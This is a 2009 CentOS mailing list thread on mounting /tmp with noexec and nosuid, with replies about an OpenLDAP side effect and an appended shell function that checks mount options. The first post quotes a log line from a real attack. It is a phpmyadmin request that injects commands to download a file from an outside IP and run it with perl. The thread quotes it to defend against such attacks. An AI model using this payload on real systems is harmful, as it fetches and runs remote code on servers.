Does mounting /tmp as noexec,nosuid break anything in CentOS 5? I've been in Solaris land forever and a day and this is a pretty standard security measure. I noticed CentOS comes default mounting /tmp with both those options allowed. I'm getting constant PHP hack attacks against my server (mostly script kiddie level stuff right now) and will rest much easier with this setting in place. We've been evaluating numerous wiki products, which are certain to have security holes, as well as phpmyadmin. Seeing a lot of crap like this:
193.253.240.85 - - [23/Aug/2009:16:57:57 -0500] "GET /phpmyadmin/config/config.inc.php?c=cd%20/tmp;rm%20-rf%20font-nix;wget%2078.46.33.52/font-nix;perl%20font-nix HTTP/1.1" 404 230
(of course I use cryptic names for my phpmyadmin install directory as well as password protect the directory and make any sensitive config files readable only by the web server owner)
Thx for any info
rhugga
On Mon, Aug 24, 2009 at 2:04 PM, Chuck <chuck.carson@gmail.com> wrote:
CentOS mailing list CentOS@centos.org http://lists.centos.org/mailman/listinfo/centos
I've been doing this for a lot of time without issues. noexec,nosuid,nodev ftw! :)
Hi,
On Mon, Aug 24, 2009 at 09:04, Chuck <chuck.carson@gmail.com> wrote:
> Does mounting /tmp as noexec,nosuid break anything in CentOS 5?
It breaks the OpenLDAP server, but it can be worked around by setting the $TMP environment variable to another directory in /etc/sysconfig/ldap. I believe there are other packages that might be affected, but in most cases I think they might be fixable by setting environment variables or patching scripts. YMMV.
HTH,
Filipe
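Added example, not part of the thread and not CentOS's own tooling: a shell function that reads a file in /proc/mounts format and reports which of noexec, nosuid and nodev are missing on a mount point, or that the path has no mount entry of its own. The function names, the sample device names and the /var/tmp and /dev/shm paths in the loop are assumptions made for the illustration.

```shell
#!/bin/sh
# Added example, not code from the thread.
# missing_opts MOUNTS_FILE MOUNTPOINT [REQUIRED_OPTS]
# MOUNTS_FILE uses the /proc/mounts layout: device mountpoint fstype options ...
# Prints the missing options, "none", or "not-mounted" when MOUNTPOINT has no
# entry of its own (it is then just a directory on its parent filesystem).
missing_opts() {
    mounts_file=$1
    mountpoint=$2
    required=${3:-"noexec nosuid nodev"}
    # Keep the last matching entry: a later mount shadows an earlier one.
    opts=$(awk -v mp="$mountpoint" '$2 == mp { o = $4 } END { print o }' "$mounts_file")
    if [ -z "$opts" ]; then
        echo "not-mounted"
        return 0
    fi
    missing=""
    for want in $required; do
        case ",$opts," in
            *",$want,"*) ;;                 # option present
            *) missing="$missing $want" ;;  # option absent
        esac
    done
    if [ -z "$missing" ]; then
        echo "none"
    else
        echo "${missing# }"
    fi
}

# Constructed sample in /proc/mounts format (device names are made up).
write_sample_mounts() {
    cat > "$1" <<'EOF'
/dev/mapper/VolGroup00-LogVol00 / ext3 rw 0 0
/dev/sda3 /tmp ext3 rw,nosuid 0 0
tmpfs /dev/shm tmpfs rw,noexec,nosuid,nodev 0 0
EOF
}

# Live report for the usual world-writable locations (paths are assumptions).
if [ -r /proc/mounts ]; then
    for mp in /tmp /var/tmp /dev/shm; do
        echo "$mp: $(missing_opts /proc/mounts "$mp")"
    done
fi
```

A result of not-mounted means the path is a plain directory on its parent filesystem and takes that filesystem's options, so noexec,nosuid would need /tmp on its own mount.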